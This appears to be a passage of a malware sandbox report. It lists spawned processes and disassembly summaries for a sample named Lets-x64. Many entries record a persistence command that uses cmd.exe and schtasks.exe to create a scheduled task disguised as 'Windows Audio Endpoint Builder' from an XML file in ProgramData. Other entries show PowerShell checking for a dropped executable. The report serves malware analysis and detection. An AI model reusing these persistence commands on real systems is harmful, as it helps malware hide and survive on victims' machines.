                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:121
                                                                                                                  Start time:10:11:40
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:122
                                                                                                                  Start time:10:11:47
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:123
Start time:10:11:48
Start date:29/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:124
Start time:10:11:48
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:125
Start time:10:11:54
Start date:29/12/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:0x300000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:126
Start time:10:11:58
Start date:29/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:127
Start time:10:11:58
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:128
Start time:10:11:59
Start date:29/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:129
Start time:10:12:00
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:130
Start time:10:12:07
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:131
Start time:10:12:08
Start date:29/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:132
Start time:10:12:08
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:133
Start time:10:12:16
Start date:29/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:134
Start time:10:12:16
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:135
Start time:10:12:27
Start date:29/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:136
Start time:10:12:21
Start date:29/12/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:0x300000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:137
Start time:10:12:26
Start date:29/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:138
Start time:10:12:26
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:139
Start time:10:12:30
Start date:29/12/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:0x300000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:140
Start time:10:12:32
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:141
Start time:10:12:33
Start date:29/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:0x790000
File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:142
                                                                                                                  Start time:10:12:36
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:143
                                                                                                                  Start time:10:12:36
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:144
                                                                                                                  Start time:10:12:48
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:145
                                                                                                                  Start time:10:12:39
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:146
                                                                                                                  Start time:10:12:45
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:147
                                                                                                                  Start time:10:12:45
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:148
                                                                                                                  Start time:10:12:45
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:149
                                                                                                                  Start time:10:12:48
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:150
                                                                                                                  Start time:10:12:50
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:151
                                                                                                                  Start time:10:12:55
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:152
                                                                                                                  Start time:10:12:55
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:153
                                                                                                                  Start time:10:13:05
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:154
                                                                                                                  Start time:10:12:59
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:155
                                                                                                                  Start time:10:13:00
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:156
                                                                                                                  Start time:10:13:04
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:157
                                                                                                                  Start time:10:13:04
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:158
                                                                                                                  Start time:10:13:10
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:159
                                                                                                                  Start time:10:13:13
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:160
                                                                                                                  Start time:10:13:14
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:161
                                                                                                                  Start time:10:13:14
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false


                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:19.1%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:14.7%
                                                                                                                    Total number of Nodes:285
                                                                                                                    Total number of Limit Nodes:4

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcat$wsprintf$Process$Token$CloseCodeCurrentErrorExecuteExitFreeHandleInformationLastLocalMessageMultipleObjectsOpenShellWaitfreelstrcpylstrlenmalloc
                                                                                                                    • String ID: "__IRAFN:%s"$"__IRCT:%d"$"__IRSID:%s"$"__IRTSS:%I64u"$@$Could not start the setup$__IRAOFF:%I64u$open
                                                                                                                    • API String ID: 1484400040-1136106755
                                                                                                                    • Opcode ID: dc511f67e071428669a0f2c12411c56f263dd82a6b2ccece939b67f281d95484
                                                                                                                    • Instruction ID: 527471fa40da41d3d42e00df8b645242e8b9656159463ad5884504198b065bd2
                                                                                                                    • Opcode Fuzzy Hash: dc511f67e071428669a0f2c12411c56f263dd82a6b2ccece939b67f281d95484
                                                                                                                    • Instruction Fuzzy Hash: 28B13832A58B42D6EB94CF31E8445AA67B0FF48789F40403ADA4F8BA64DF3CE159C705

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Directory$lstrcpy$Currentlstrcatlstrlen$Create$Filewsprintf$AttributesDeleteDiskFreePathRemoveSpaceTemp
                                                                                                                    • String ID: %s%s_%d$%s\irsetup.exe$Could not determine a temp directory name. Try running setup.exe /T:<Path>$You must have at least 2MB of free space on your TEMP drive!$_ir_sf_temp$c:\temp$irsetup.exe$lua5.1.dll
                                                                                                                    • API String ID: 3816071345-4167539251
                                                                                                                    • Opcode ID: 099cdf72516c0135f1b5aa9ac0640ce91bc81016b26d1f710b104e2d1a9d3ea1
                                                                                                                    • Instruction ID: 5780f1d25c1ecb96d1b16b7fe068d604249d3dda0f2131d778cc7a232083d20c
                                                                                                                    • Opcode Fuzzy Hash: 099cdf72516c0135f1b5aa9ac0640ce91bc81016b26d1f710b104e2d1a9d3ea1
                                                                                                                    • Instruction Fuzzy Hash: AB812A32668A87D6EB80DF30E8941AAA371FF84745F80503AD64F8A964EF7CE54DC705

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$CreateInformationVersion
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3563531100-0
                                                                                                                    • Opcode ID: c9ef4103069467bc3e1cbfb86f8ddfe3974583134bc7e4447d0960c5f6b28c4e
                                                                                                                    • Instruction ID: 1ce87468bb8247c8fe6e15927cdf64b09f4844723d67e5f7ea55b40fdec979d6
                                                                                                                    • Opcode Fuzzy Hash: c9ef4103069467bc3e1cbfb86f8ddfe3974583134bc7e4447d0960c5f6b28c4e
                                                                                                                    • Instruction Fuzzy Hash: 9EE06D74A29B52C2FBC46771A8157762270FFC8341F80003DE90F8AB54DF3C9085860A

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcpy$_lopenfreemalloc
                                                                                                                    • String ID: Could not find compression type indicator$Could not find data segment$Could not find multi-segment indicator$Could not find setup size$Could not find total size indicator$Unable to allocate memory buffer$Unable to open archive file
                                                                                                                    • API String ID: 2570182538-3063878580
                                                                                                                    • Opcode ID: 52b639742314e37657841c789f1007307af1c7c9b1b5e16dccf3db46395a60ee
